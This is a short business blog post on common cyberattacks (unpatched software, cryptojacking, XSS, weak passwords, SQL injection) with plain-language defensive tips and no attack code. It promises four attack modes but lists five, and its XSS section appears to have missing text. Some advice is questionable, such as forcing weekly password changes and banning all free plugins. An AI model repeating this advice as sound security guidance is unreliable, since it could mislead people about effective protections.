- Your systems could have been breached five years ago, and the hackers may be sitting there stealing your data every day – That’s what happened in the Marriott Hotels security breach, hackers gained access in 2014 and were only discovered in November 2018.
- GCHQ boss, Dr. Ian Levy, predicts that a massive cyber-attack that can only be countered by a government-level response will hit us in the next few years. This attack will be far bigger than the 2017 WannaCry attack that crippled the NHS and German railway system.
- Most hacking attacks are preventable because they exploit well-known software vulnerabilities.
How are you protecting yourself in 2020?
UK cybersecurity and penetration testing provider Bulletproof, discussed the current threat landscape in its Annual Cyber Security Report 2019 and elaborated how most attacks exploit the same software vulnerabilities they did last year and the year before.
Let’s look at these 4 attack modes in plain English:
Attack #1 – Unpatched software
Software is expensive and you have every right to expect it to be perfect. It isn’t and it won’t ever be perfect.
Software companies release patches and updates as they discover security issues with the current version of their products. This happens even with programs like Microsoft Office ®, WordPress ®, Google’s Chrome ® browser. Large software companies release patches frequently because they have the resources to fix any bad coding that created the problem. Small companies with fewer resources may be slower at releasing bug fixes.
The big problem is on the user end of the software application where customers think of computer programs like a kitchen appliance: Use it until it stops working, then replace it with the latest version.
Installing updates is time-consuming and runs counter to the “If it ain’t broken, don’t fix it” philosophy many businesses have. Consequently, many companies keep using the original software because it appears to be working perfectly whereas in reality, hackers may be coming in and out of your computer like bargain-hunters at Walmart.
Attack #2 – Crypto Jacking
Cryptojacking is where hackers use your computers to mine cryptocurrencies. The hacker pays none of the energy costs, none of the replacement costs and uses your resources to earn Monero or other cryptocurrencies.
What harm does crypto jacking do? It increases your electricity costs and slows down your machines.
One of your company users might have visited a website that had a malicious script installed, the script loads malware onto your computer and from that moment on, part of that machine’s CPU will be working for the crypto jacker, earning them virtual currencies.
How can you fight crypto jacking?
- Look out for any slow-running computers
- Install anti-malware software
- Educate employees
- Install updates and patches immediately they are available
Attack #3 – Cross Site Scripting (XSS)
Escaping requires specialist knowledge to implement, so here’s the plain English version:
- Use a content management system such as WordPress or Drupal
- Only install plugins from reputable companies because plugins are often an XSS open door to hackers. Update all plugins as soon as an update is offered and avoid free plugins altogether because of delays in patching them (as described here).
Attack #4 – Poor Passwords
Passwords make life difficult for you. It is much easier to use the same password everywhere you go or to use the default password if one exists. Don’t Do It.
If hackers gain access to passwords from one site, they will sell the list because many users do use the same password everywhere they go.
Hackers will routinely try simple passwords such as “password” or “123456” and will have access to programs that try every word in the dictionary.
A good password is random, includes numbers, special symbols, and upper/lower case letters. There are two more criteria which are rarely present; It must be changed every week, and it must never be written down.
Attack #5 – SQL Injection
Structured Query Languages (SQLs) are used to create and interact with databases. Your website and company databases are very attractive targets for hackers, and many databases have been set up using sloppy code that allows hackers to steal or change your data.
If you have a WordPress website, a Pro-level security plugin will protect you from most SQL injection attacks.
Minimise the risk of SQL injection attacks by limiting users to the lowest levels of permission and by white-listing authorised users (black-listing all unknown users.)
Most attacks use the same old hacker vulnerabilities they always have. They work, so why would they go looking for new ways in.
What can you do? Update all your software every time a new patch is released, use a CMS with only premium plugins, install a security plugin and enforce regular password changes. When you have all the simple DIY stuff in place, then consider investing a few thousand by asking a cyber-security company to take a look at your defences.